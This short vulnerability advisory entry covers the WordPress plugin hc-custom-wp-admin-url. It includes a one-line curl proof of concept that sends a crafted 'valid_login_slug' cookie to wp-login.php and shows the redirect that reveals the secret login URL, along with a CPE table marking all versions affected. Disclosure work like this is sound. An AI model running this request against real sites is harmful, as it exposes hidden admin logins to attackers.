The plugin leaks the secret login URL when sending a specific crafted request
curl -sIXGET -H “Cookie: valid_login_slug=1” https://example.com/wp-login.php HTTP/2 302 x-redirect-by: WordPress location: secret
CPE | Name | Operator | Version |
---|---|---|---|
hc-custom-wp-admin-url | eq | * |